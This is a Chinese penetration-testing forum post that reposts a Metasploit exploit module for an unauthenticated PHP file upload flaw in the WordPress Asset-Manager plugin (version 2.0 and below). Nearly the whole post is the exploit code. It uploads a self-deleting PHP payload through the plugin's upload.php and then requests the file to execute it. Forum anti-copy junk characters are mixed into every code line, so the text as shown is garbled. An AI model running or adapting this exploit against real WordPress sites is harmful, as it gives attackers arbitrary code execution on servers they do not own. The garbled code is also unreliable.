找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2520|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
% J! g) w' q- R1 u2 r% Y1 u' A# Z- F" T; p7 ~3 W
##
9 x2 }/ ]$ y* _# This file is part of the Metasploit Framework and may be subject to
8 p! \3 j" s# m! q4 j1 P& F# redistribution and commercial restrictions. Please see the Metasploit8 c6 U2 E/ F& L4 h! }
# Framework web site for more information on licensing and terms of use.; w* y: y5 s3 c1 Q
#   http://metasploit.com/framework/6 @, T# |8 E3 e2 k; `# q
##
& l" i0 L) y9 A6 c8 R " m, |: j# \) r" |
require 'msf/core'& |$ b, r% @6 i5 A* v( m5 Z
require 'msf/core/exploit/php_exe'
/ b$ [9 X) [0 Z" T8 }
. L! V- I5 V7 E6 Q! P5 ~class Metasploit3 < Msf::Exploit::Remote
& I( Z: \+ W- c7 |$ F  Rank = ExcellentRanking, F" o$ z: L- q! K

1 q8 T& Z6 v4 b( e  include Msf::Exploit::Remote::HttpClient3 F+ r" T3 k6 ^' R) J/ \, ?
  include Msf::Exploit:hpEXE3 u" R6 L. C- ~' {

$ a, R6 K& B8 y# C  def initialize(info = {})% N; v# f, @( D  I- y% \
    super(update_info(info,$ {% q& B4 q- L: l3 u5 c& u% n
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',& R, p# ]" u0 e
      'Description'    => %q{. ~3 A/ m' e4 c
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
1 X) i9 E: ^' f' s        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
7 c) ]( ^1 A, o( G1 g+ O( C( K. `/ H( y: F        temp directory without authentication, which results in arbitrary code execution.
! d% S; W. X6 _5 `  p- c1 K3 ?      },
8 u4 N- G  D/ J0 p( o/ P      'Author'         =>5 h, r/ G' a& Q3 t; A- Z" u
        [: \( Z0 ]; l- f8 h+ c
          'Sammy FORGIT', # initial discovery2 F$ W) U. j7 @) \- w
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module  Y8 I% j0 C3 V& {9 O, ?
        ],
# I4 o- {# m4 H* L) _& b) n" X3 T* N      'License'        => MSF_LICENSE,
' \3 U, c& o$ Q+ @  f      'References'     =>2 V3 q  H9 b* n2 i
        [& T6 J+ k8 k# L7 E* q
          [ 'OSVDB', '82653' ],- X+ ~2 \- ?' ?5 b# H, R% c, T
          [ 'BID', '53809' ],
3 q/ H2 ~1 l/ {; T0 D: Z8 }          [ 'EDB', '18993' ],% r% X% X6 \. P, C) ]
          [ 'URL', 'http:// www.myhack58.com /' ]% A6 ]" B. h6 V& y% r
        ],. B  N0 `0 W: U
      'Payload'       =>" P. y% R  b6 v  y' R% ?9 R2 _
        {
' F) U7 o4 J$ c1 Y9 G! Z; w, d$ b          'BadChars' => "\x00",
) ~% A6 Y1 O8 w" k. N        },
6 U6 V6 ^5 K7 D/ O8 T      'Platform'       => 'php',
  f+ ]  y% W7 A7 t3 P3 Y      'Arch'           => ARCH_PHP,5 B. I* y# `: k2 n1 m
      'Targets'        =>
, e9 y/ M1 z+ K$ v5 X        [- U7 w; N! [; m+ T/ o2 K9 T1 m2 V" p
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],7 s, P& c2 x3 j: l& i
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]# }2 }* k3 ?+ Y5 m! L" @9 m8 Y1 U& M7 }
        ],
- c; z3 @: d, q! ~6 \3 f" f      'DefaultTarget' => 0,1 e- w% E1 a5 k8 P- l9 B
      'DisclosureDate' => 'May 26 2012'))0 Z# z( g4 \3 r  k1 A% m2 V

3 B4 P# X) p6 _/ E/ P    register_options(
5 F' F1 m4 M5 P4 V9 w! R& T; b: c      [" ^5 ?' g8 ]4 N+ ]
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
# R, @' R* ?/ w8 U      ], self.class)
7 I$ M) \2 j1 l: g  end- U( q  N; \" \  ^+ W2 `

6 ?) z3 i$ P5 O# b+ w; d: s: [4 U' f1 P  def exploit* q5 ]/ i0 U; l2 N
    uri =  target_uri.path% N1 r3 }# p* e0 @' D% m1 Y
    uri << '/' if uri[-1,1] != '/'/ f) o7 G9 o6 t7 d9 l/ d
    peer = "#{rhost}:#{rport}"
3 i  A, g# b1 H    payload_name = "#{rand_text_alpha(5)}.php"
( u% K) Z$ P$ j+ {    php_payload = get_write_exec_payload(:unlink_self=>true)
6 q1 O( E9 \, Y 0 M( z) G& j4 y0 j& O  J& d
    data = Rex::MIME::Message.new
$ j1 ~8 j9 L5 P& C    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")* \3 Y! I1 F  P5 `  [# D. R* \0 `: A; E
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')1 x+ s+ v+ K. G" G4 F

& c% |) Q- n; S7 j. a$ M% R/ q. Y    print_status("#{peer} - Uploading payload #{payload_name}")+ b( F/ D3 t7 Y( v% F4 V# v
    res = send_request_cgi({+ b) k$ q$ _9 s: L9 j
      'method'  => 'POST',+ B9 h! ?/ U1 u7 O* P  P
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
% M1 w" x& r) w" O+ ]2 q      'ctype'   => "multipart/form-data; boundary=#{data.bound}",! `7 ]# x9 {  S% G8 P  `
      'data'    => post_data" Q6 h  \6 O$ [/ b' p* A. @
    })
3 [$ n5 r( `% z4 l
1 q$ {2 L1 O. s: @    if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 c8 Z& `0 A; \$ C! I! k* S/ i      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")& U" b8 s4 H4 z) N$ ~" a1 Q" z
end
6 f- `  w4 [8 h, t7 ?  z% C : v% Q0 D  |& K, Z# z8 c) s
    print_status("#{peer} - Executing payload #{payload_name}")
' P2 P+ x7 b! @+ e6 c8 D0 R    res = send_request_raw({
4 B! O) ^' c7 z$ l. I% x" B4 O      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
0 O4 N* H* `: l      'method'  => 'GET'$ K- n; Q7 n2 u& F
    })4 ~0 ^% L; Y' V6 T+ y8 Y
4 ^& M" G; h6 t- M
    if res and res.code != 200- r: L: x) z" ?4 m: f& x
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
3 H' K! M: L; c9 a1 I- v    end
/ |6 ~# {( `) R, D& C$ p( J8 R4 y  end
! V1 M$ a" o3 t" |end
' E9 o- |' i; _8 @0 W
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表